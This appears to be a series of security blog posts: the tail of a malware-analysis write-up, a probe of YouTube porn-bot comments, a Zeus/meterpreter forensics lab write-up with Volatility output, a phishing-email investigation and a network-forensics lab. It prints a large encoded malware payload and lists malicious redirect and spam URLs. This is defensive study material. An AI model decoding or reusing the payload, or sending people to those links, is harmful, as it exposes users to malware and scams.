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";
 return qGxZ;

Knowing that I have the key for the RC4, from question 3, and that the string is in base64 I put it all into CyberChef:

UspD is the first function in this code.

Conclusion

This was a TOUGH one for me. I needed a couple of hints along the way, but I really enjoy malware analysis. I learnt a fair amount and just need more practice to get even better. One of the big things I learnt was about deobfuscating code using olevbs, I did need help with using a small python program. But it felt satisfying to get it done. On to the next one.

Introduction

The hook? Porn. The end result? Not so sure just yet.

I am going to be looking in to the rise of YouTube’s porn bot comments, how they operate and whats down the rabbit hole.

Not exactly needle in a haystack

While watching a recent video personal finance I did something that I shouldn’t and wouldn’t normally do. Read the comment section. Within seconds I saw a top liked comment that had an almost identical one that was a few comments down. At the time I didn’t really think to screenshot it, but I knew I wanted to do a little digging and find out why, how and what these bot accounts were up to.

Going back to the video today reveals the accounts or at the very least the comments have been removed. So I had to go find some more, after clicking on a bunch of recent high view videos I found what I was after.

It makes up most of the internet

These comments are rather easy to spot and follow a very basic pattern.

• They have a conventionally attractive women in the profile picture
• They have a high like count, sometimes dwarfing other top comments
• The name on the account is somewhat feminine
• Their profiles, once click, link to another account with a rather…descriptive name.
• They have stolen and altered the text of another top comment.

I will be blurring out most screenshots for everyone's sake.

The comment

Let’s start with this one:

This comment checks off the above list rather well. In fact, the comment that is has copied and altered in 3 comments below this one.

If I had to guess, they have used AI to rewrite the comment. The old version of this type of malicious campaign would straight up just copy paste. The bot comment has a few replies, mostly remarking how it is a bot comment.

So the profile itself doesn’t have a link in their bio that leads to a malicious site, however as you can see from the screenshot above it links to another channel. Which…I have blurred because its straight up porn. So the channel seems to be able to skirt any sort of report for the comment they left, since its pretty benign. The report function on the channel also doesn’t really have any categories that match what they are presenting:

Going down the list. There is no channel art to report, the profile picture is fine (?) and reporting the user itself leads to the following:

It doesn’t really match any of the issues listed and selecting “None of these are my issue” just leads to a support page.

Doing a reverse image search on the picture reveals a TON of YouTube accounts doing the exact same thing. All linking to other channels that then proceed to link to malicious websites.

Down the rabbit hole

Now its time to follow a couple of links using a sandbox’d web browser.

I found 3 different links that I will be looking into today.

rebrand.ly/Renatta-queennnnnn
seksswithmee.pse.is/Evangeline-kimmy7
anna.is-best.net

The first 2 had actually been disabled already by the link shortening services. They seem to be decently quick, but I have found that there are 100s of rebrand.ly links. Which begs the question, how much of their service is just malicious links and are the people creating these links using a free plan, or a premium one that allows you to create way more.

I found another rebrand link:

Most of these other profiles that are link have rebrand links. Following the link using URLscan I was able to uncover the following:

It looks like I was the first one to scan the URL at the top of the image. The main website is completely blank, which is quite common. The usually require a query at the end of the URL, which would track the clicks from a certain source. I couldn’t find too much else about this domain, but finding something new that hasn’t been scanned is quite exciting.

The 3rd URL is the most interesting to me. It’s a subdomain of a web hosting company (sort of):

A quick search online reveals in reality this website has just cloned a legitimate web hosting company as cover for a malicious redirect website. The domain was first registered back in 2012, but the URL actually has a wayback machine capture from 2003:

Yeah, so it looks like this URL has always been used for malicious purposes, all the links on the page link to even seedier websites. The next captures in 2012 look to be hosting company called Byethost. This trend continues until the last archive on 9th March 2026.

The URL path redirects a few times:

Looking into the subdomain specifically, it seems to advertise a dating app. Or at least that’s what one of the scans indicated.

Depending on where it was scanned from I would get a fake capcha or the above screenshot. Here is the Hybrid Analysis results.

What can YouTube do about this?

With all the random AI features on the website that no one seems to like, AI generated dubbing for example, they could remove the ability to add links to channel descriptions. Having a feature that only allows only verified links from certain websites to be listed in a separate tab. This wouldn’t stop everything, but one less barrier would help save a lot of people that click.

This will always be an issue, I don’t ever see it going away. Other websites could also chip in and check links that want to be shortened. ReBrand for example could do a better job at scanning the URL that is being shortened. They have a tool on their website already, but that takes someone like myself to submit their own link for it to be blocked.

Introduction

Everyone has heard of targeted attacks. Detecting these can be challenging, responding to these can be even more challenging. This scenario will test your network and host-based analysis skills as a soc analyst to figure out the who, what, where, when, and how of this incident. There is sure to be something for all skill levels and the only thing you need to solve the challenge is some l337 S4uc3!

Question 1

PCAP: Development.wse.local is a critical asset for the Wayne and Stark Enterprises, where the company stores new top-secret designs on weapons. Jon Smith has access to the website and we believe it may have been compromised, according to the IDS alert we received earlier today. First, determine the Public IP Address of the webserver?

Answer 1

I ended up using Network Miner to figure this out. However first I found out that it goes not take the “next-gen” version of pcap files: pcapng. So I opened the file up in Wireshark and just saved it as a Wireshark pcap.

Above is the webserver and its IP address.

Question 2

PCAP: Alright, now we need you to determine a starting point for the timeline that will be useful in mapping out the incident. Please determine the arrival time of frame 1 in the “GrrCON.pcapng” evidence file.

Answer 2

Very simple, since the question outlines what you need to do.

Just as a note to myself, most of the time the questions look for time answers in UTC.

Question 3

PCAP: What version number of PHP is the development.wse.local server running?

Answer 3

Using Network Miner again, I went to the parameters tab and searched for PHP to see what showed up in the logs. I got the following:

PHP version 5.3.2.

Question 4

PCAP: What version number of Apache is the development.wse.local web server using?

Answer 4

I did the same steps as question 3.

Question 5

IR: What is the common name of the malware reported by the IDS alert provided?

Answer 5

Looking at the IR.Alert.png, I can see that the threat is under the common name zeus.

Question 6

PCAP: Please identify the Gateway IP address of the LAN because the infrastructure team reported a potential problem with the IDS server that could have corrupted the PCAP

Answer 6

Looking through Wireshark, I can see there is one main IP address that a lot of resources are being pulled from: 172.16.0.1. Leading me to believe that its the gateaway for development.wse.local.

Question 7

IR: According to the IDS alert, the Zeus bot attempted to ping an external website to verify connectivity. What was the IP address of the website pinged?

Answer 7

This is a rather simple one, its in the IP Header Information in the alert.

Question 8

PCAP: It’s critical to the infrastructure team to identify the Zeus Bot CNC server IP address so they can block communication in the firewall as soon as possible. Please provide the IP address?

Answer 8

My first thought was the above IP address might be the CNC server. However it turns out to just be google.com. I looked through the sessions tab in Network Miner to see if there was any IP address that stood out. The 2 IPs that caught me eye were:

Wordpress is a funny one, since sometimes threat actors can take over wordpress websites and use them for nefarious deeds. However the other IP address: 88.198.6.20 had HTTP requests that didn’t lead anywhere and additionally also sent requests back to the infected host. Turns out it was 88.198.6.20, which sent requests back which made the most sense to me.

After answering the question correctly, I looked at the hints to see how they thought you would go about it. They used Brim Security to analyze the pcap file and looked for alerts, which I believe is called zui now. Luckily I already had it installed so I opened the pcap in it.

Knowing the infected machines IP address was 172.16.0.109, I searched for it as the destination and looked for a severe alert which also gave me the IP address: 88.198.6.20.

Question 9

PCAP: The infrastructure team also requests that you identify the filename of the “.bin” configuration file that the Zeus bot downloaded right after the infection. Please provide the file name?

Answer 9

Network Miner once again giving a very easy way to find this answer, under the files tab and sorting by extension led me to cf.bin.

Question 10

PCAP: No other users accessed the development.wse.local WordPress site during the timeline of the incident and the reports indicate that an account successfully logged in from the external interface. Please provide the password they used to log in to the WordPress page around 6:59 PM EST?

Answer 10

The credentials tab reveals all here.

The above timestamp matches up with a wordpress session that was carried out by the infected machine.

Question 11

PCAP: After reporting that the WordPress page was indeed accessed from an external connection, your boss comes to you in a rage over the potential loss of confidential top-secret documents. He calms down enough to admit that the design’s page has a separate access code outside to ensure the security of their information. Before storming off he provided the password to the designs page “1qBeJ2Az” and told you to find a timestamp of the access time or you will be fired. Please provide the time of the accessed Designs page?

Answer 11

Knowing the credentials is a massive help here, searching for the password string reveals 2 logins. The first is via the 172.16.0.1 gateway which means an external source. Which then provides me with the timestamp.

Question 12

PCAP: What is the source port number in the shellcode exploit? Dest Port was 31708 IDS Signature GPL SHELLCODE x86 inc ebx NOOP

Answer 12

Looking into the pcap file in Wireshark, I searched for destination ports. Both TCP and UDP. The TCP search came up with nothing, but the UDP search came up with the following:

Indicating to me that the source port was: 39709.

Question 13

PCAP: What was the Linux kernel version returned from the meterpreter sysinfo command run by the attacker?

Answer 13

To find this I ran a string search for sysinfo in Wireshark. It turned up 2 results and digging into the packet I was able to find the kernel version: 2.6.32–38-server.

Question 14

PCAP: What is the value of the token passed in frame 3897?

Answer 14

Jumping to the specific packet I can see the following token was passed:

Question 15

PCAP: What was the tool that was used to download a compressed file from the webserver?

Answer 15

For this I know I am looking for a GET request. So filtering the requests in the pcap I found a compressed file named: unimportant.tar.gz.

Then I just looked through the packet to find that wget was used to retrieve the file.

Question 16

PCAP: What is the download file name the user launched the Zeus bot?

Answer 16

There have been a couple of suspicious files that I have found so far. One that I stumbled across earlier was bt.exe. To find it again, I just looked through the GET requests to see if the attacker had downloaded it or if I was something else.

Question 17

Memory: What is the full file path of the system shell spawned through the attacker’s meterpreter session?

Answer 17

I much prefer using Vol3 for these types of deep dives, but I had to use Vol2 here in order to use the provided profile. Using the following command I set to look out for a shell spawn:

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pslist

I found a couple of processes that match up to spawning a shell:

0xffff880006dd8000 sh 1274 1042 33 33 0x0000000006d94000 2013-09-10 22:55:40 UTC+0000
0xffff88000a9b1700 sh 1275 1274 33 33 0x0000000006eb3000 2013-09-10 22:55:40 UTC+0000

I found a command that I was a little unfamiliar with that would help me find the commands that were executed alongside this shell spawn:

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_psaux

Which gave me the following:

1274   33     33     sh -c /bin/sh                                                   
1275   33     33     /bin/sh  

These processes numbers match up with the ones from before, the directory in which the shell was spawned is /bin/sh.

Question 18

Memory: What is the Parent Process ID of the two ‘sh’ sessions?

Answer 18

Using the pstree linux plugin I was able to get the following:

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pstree | grep 'sh' -C6
.mysqld              1029            115            
.mysqld              1030            115            
.mysqld              1031            115            
.apache2             1032                           
..apache2            1040            33             
..apache2            1042            33             
...sh                1274            33             
....sh               1275            33             
..apache2            1043            33             
..apache2            1045            33             
..apache2            1047            33             
..apache2            1267            33             
..apache2            1269            33             
..apache2            1270            33

Looking at the tree the answer being 1042. Since both instances of sh are below it. Not 1032 because that is the parent of the 1042 process.

Question 19

Memory: What is the latency_record_count for PID 1274?

Answer 19

I got majorly stumped on this question, I had to look up some information on how to tackle this one. The definition for the latency_record_count is as follows: “A Linux kernel metric that tracks how many times a process has experienced scheduling latency beyond a certain threshold.”

This was straight up new for me, I had never dived deep into the linux kernal before when looking for artifacts so I needed to pointers.

I first used the linux_volshell plugin which loaded the following:

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_volshell
Volatility Foundation Volatility Framework 2.6.1
Current context: process init, pid=1 DTB=0x176ba000
Python 2.7.18 (default, Aug  1 2022, 06:23:55) 
Type "copyright", "credits" or "license" for more information.

IPython 5.10.0 -- An enhanced Interactive Python.
?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object', use 'object??' for extra details.

In [1]:

Then I had to use the following command to find the latency_record_count:

dt("task_struct",0xffff880006dd8000)

Giving me this:

0x798 : dirties                        18446612132429399960
0x7b0 : latency_record_count           0
0x7b8 : latency_record                 -

So I going to explain what I have learnt from this, firstly linux_volshell.

vol_shell is an interactive plugin that comes with volatility 2 and 3 that can dive a little deeper into specific processes and their memory locations, by opening an interactive shell to use. I have so far only used it in Vol2, I am sure it will come up when I use Vol3 more. I am not 100% sure what “dt” stands for, but for now I know I need to use it to explore more.

task_struct in the Linux kernel contains all information about a process. In this questions case, the shell/sh that the attacker opened.

I hope that enlightens things a little, I am still learning with these labs and this was a question I needed a nudge for. With the answer being 0 it meant that the attacker was not doing anything to resource intensive since shells don’t normally use too much. If they were doing something like crypto mining, there could have been a delay there.

Question 20

Memory: For the PID 1274, what is the first mapped file path?

Answer 20

This one was a little more straight forward compared to the last question for me. Using the linux_proc_maps and specifying the PID I am able to see the following:

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_proc_maps -p 1274
Volatility Foundation Volatility Framework 2.6.1
Offset             Pid      Name                 Start              End                Flags               Pgoff Major  Minor  Inode      File Path
------------------ -------- -------------------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- ---------
0xffff880006dd8000     1274 sh                   0x0000000000400000 0x0000000000418000 r-x                   0x0      8      1     651536 /bin/dash
0xffff880006dd8000     1274 sh                   0x0000000000617000 0x0000000000618000 r--               0x17000      8      1     651536 /bin/dash
0xffff880006dd8000     1274 sh                   0x0000000000618000 0x0000000000619000 rw-               0x18000      8      1     651536 /bin/dash
0xffff880006dd8000     1274 sh                   0x0000000000619000 0x000000000061c000 rw-                   0x0      0      0          0 
0xffff880006dd8000     1274 sh                   0x000000000151a000 0x000000000153b000 rw-                   0x0      0      0          0 [heap]
0xffff880006dd8000     1274 sh                   0x00007f878ac5f000 0x00007f878addc000 r-x                   0x0      8      1     652393 /lib/libc-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878addc000 0x00007f878afdb000 ---              0x17d000      8      1     652393 /lib/libc-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878afdb000 0x00007f878afdf000 r--              0x17c000      8      1     652393 /lib/libc-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878afdf000 0x00007f878afe0000 rw-              0x180000      8      1     652393 /lib/libc-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878afe0000 0x00007f878afe5000 rw-                   0x0      0      0          0 
0xffff880006dd8000     1274 sh                   0x00007f878afe5000 0x00007f878b005000 r-x                   0x0      8      1     652382 /lib/ld-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878b1f2000 0x00007f878b1f5000 rw-                   0x0      0      0          0 
0xffff880006dd8000     1274 sh                   0x00007f878b202000 0x00007f878b204000 rw-                   0x0      0      0          0 
0xffff880006dd8000     1274 sh                   0x00007f878b204000 0x00007f878b205000 r--               0x1f000      8      1     652382 /lib/ld-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878b205000 0x00007f878b206000 rw-               0x20000      8      1     652382 /lib/ld-2.11.1.so
0xffff880006dd8000     1274 sh                   0x00007f878b206000 0x00007f878b207000 rw-                   0x0      0      0          0 
0xffff880006dd8000     1274 sh                   0x00007fff5f643000 0x00007fff5f659000 rw-                   0x0      0      0          0 [stack]
0xffff880006dd8000     1274 sh                   0x00007fff5f7a1000 0x00007fff5f7a2000 r-x                   0x0      0      0          0 [vdso]

The answer being at the top of the list, /bin/dash.

Question 21

Memory:What is the md5hash of the receive.1105.3 file out of the per-process packet queue?

Answer 21

Looking through the different commands I could throw at the memory dump using -h. I found that linux_pkt_queues fit the bill rather well.

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 -h  
Volatility Foundation Volatility Framework 2.6.1
                linux_pkt_queues        Writes per-process packet queues out to disk

Then it was just a matter of dumping the files and using the command line to find the hash.

python2 vol.py -f dump/webserver.vmss --profile=LinuxDFIRwebsvrx64 linux_pkt_queues -D dump/files
Volatility Foundation Volatility Framework 2.6.1
Wrote 32 bytes to receive.930.10
Wrote 32 bytes to receive.1105.3

MD5 Hash:

md5sum receive.1105.3
184c8748cfcfe8c0e24d7d80cac6e9bd  receive.1105.3

I forgot to screenshot the confetti so this is the best I could do:

This was a little challenging towards the end, not really knowing a couple of the plugins for Volatility2. But it was a super enjoyable box.

I have a small fancination with spam emails, so I took a little bit of a deeper dive into this one. I first ran my .eml parser tool on the email file and got the following:

└─$ ./eml_parser -f 1.eml     

___________              .__.__    __________                                   
\_   _____/ _____ _____  |__|  |   \______   \_____ _______  ______ ___________ 
 |    __)_ /     \\__  \ |  |  |    |     ___/\__  \\_  __ \/  ___// __ \_  __ \
 |        \  Y Y  \/ __ \|  |  |__  |    |     / __ \|  | \/\___ \\  ___/|  | \/
/_______  /__|_|  (____  /__|____/  |____|    (____  /__|  /____  >\___  >__|   
        \/      \/     \/                          \/           \/     \/       
        
Make sure to manually check the file for residual artifacts

File Name: 1.eml
Received SPF: Pass (protection.outlook.com: domain of em4284.thethriftygroove.com designates 149.72.70.15 as permitted sender) receiver=protection.outlook.com; client-ip=149.72.70.15; helo=s.wrqvqshf.outbound-mail.sendgrid.net; pr=C
SPF Passed: true
DKIM Result: pass
Return Path:  bounces+54236783-7f2f-my=email@em4284.thethriftygroove.com
From: サインイン通知 <ui@thethriftygroove.com>
To: "email" <email>
Reply-To: N/A
Subject:  【Amazon.co.jp】新しいデバイスからのサインインがありました

Links:

  - https://soutien-nicolas.com/security/information

Emails Found in Body:

The body of the email of course is in Japanese. Which I couldn’t read, so I used Papago to translate it. Turns out its a classic “We have detected a new sign in from X location”.

Time to look into the URLs and IP addresses that are associated with the email.

xzznhznor.nl (Originating URL, according to PhishTool)
soutien-nicolas.com (in body of email)
thethriftygroove.com (DKIM Signature email and return email)
231.75.66.8 (IP Address in the email body)
149.72.70.15 (IP Address from the SPF record)

The first URL on that list seems to have been a straight spoof. Nothing comes up. The second one was a little more interesting. I first searched it via URL Scanner and it goes to a very basic landing page, which is based in Tokyo Japan.

I have never thought about doing this before, but I decided to check the internet archive to see if there was any information or snapshots of the site prior to its use in spam emails.

Looks like there are quite a few captures of this URL. Checking 2026 and 2025, interestingly these captures have nothing on the page but have Chinese titles.

“乐动在线平台-乐动”

“Ledong Online Platform – Ledong”

This is the only translation I could gleam from the text. So at some point someone registered it from China and set up a front? I then went to the earliest archive of the website. 20/06/2013.

Okay, so the website is just a name and the website was originally set up as a petition? Translating the text gives me the following:

Nicolas, a young opponent of the Taubira Act, was sentenced to two months’ imprisonment and a fine of 1,000€ for “rebellion” which his lawyer disputes, video supporting. On 16 June 2013, during a peaceful demonstration, he had been charged violently, without warning of use by law enforcement and then arrested in a private place without an initial offence.
He is charged with two other charges: “misleading identity” because he gave his mother’s last name and refused to engage in a DNA swab.
He was immediately collapsed in Fleury-Mérogis prison.

Alright then. So this was the original reason for this websites creation. Apparently he was also freed?

This is a capture from 2014 with the title: Judgment on appeal: Nicolas is free!

So since this whole issue with Nicolas had resolved the domain was left to expire on 6th September 2018. But it was then quickly registered to someone in Indonesia in 2019.

It then seemingly became an article spam website.

Just hundreds of random articles about anything from food to insurance. Which then expired a couple of years later and went on sale. This leads us up to the most recent domain registration. 30th April 2025.

It expires at the end of this month, so I will be checking back to see if its been renewed.

Now comes the fun part, loading the webpage in a sandbox:

This is the current landing page of the original URL. It redirects to another website that is hosted in Brazil. And so the rabbit hole goes deeper. I am going to skip to the chase a little here. So the website itself, in its early years, was a redirect. Belle Vue makeup -> East Side makeup.

Above is a capture from 2023, although the website looks like its not been used since 2015 going by the copyright mark at the bottom of the page. Although that could be very unreliable. Now to its most recent archive:

Translation of the top text (via papago):

Official website for online viewing and download of tough guy videos_ Free online viewing of tough guy videos_ Download the tough guy video app_ Download tough guy videos

This could very well be something else…the translation might not be perfect. Most of the links in the archived version don’t work. Apart from the ones at the very bottom. All of them linking to other RANDOM websites that have the same layout. These could very well be part of the spam network. Although I am unable to confirm since I only have this one URL from the email I got.

http://southernstarmedical.com/
http://m.sw3yj.com/
http://gamdomrain.com/
http://m.qidgj.com/
http://m.hnqcyw.com/
http://bancosantandercentral.com/
http://m.xiaoguzhubao.com/
http://sheblogsaboutjobs.com/
http://fengyansb.cn/
http://tantanautomation.com/

Most of these website have the same footer, with different links to different websites:

One of them even linked to the following:

It does look like the website is not defunct thankfully. Although its still possible its infected with some sort of malware and might even try and drop malware on your system if you aren’t running up to date browser software. This, I can’t confirm. What I do believe is happening is a random group of spammers buy up old domains that had previously been used for some random purpose, then repurpose them into landing pages for links that are in spam emails.

Scenario

A company’s internal server has been flagged for unusual network activity, with multiple outbound connections to an unknown external IP. Initial analysis suggests possible data exfiltration. Investigate the provided network logs to determine the source and method of compromise.

Question 1

What is the FTP password?

Answer 1

Filtering the packets by FTP showed a login processes revealing a plaintext password:

Question 2

What is the IPv6 address of the DNS server used by 192.168.1.26?

Answer 2

Originally I read the question as, finding the IPv6 address of 192.168.1.26, but its finding the DNS in which that IP address uses. Which made more sense, always double check the question.

Locating the MAC address of the DNS server was key here, so I filtered for DNS requests. Then located a conversation between 192.168.1.26 with a DNS server, which turned out to be 192.168.1.10. Then it was a simple cross referencing the MAC address to the IP that ends in 10, with the IPv6 conversations.

Giving me:

fe80::c80b:adff:feaa:1db7

Question 3

What domain is the user looking up in packet 15174?

Answer 3

No need for an explanation here, just navigating to the packet and reading the data.

Question 4

How many UDP packets were sent from 192.168.1.26 to 24.39.217.246?

Answer 4

The Conversations tool in Wireshark is perfect for this question.

10 total packets sent.

Question 5

What is the MAC address of the system under investigation in the PCAP file?

Answer 5

In a previous question we are asked about the host machine contacting a DNS server. So finding the MAC address of the IPv4 192.168.1.26 was as easy as finding a single packet.

c8:09:a8:57:47:93

Question 6

What was the camera model name used to take picture 20210429_152157.jpg?

Answer 6

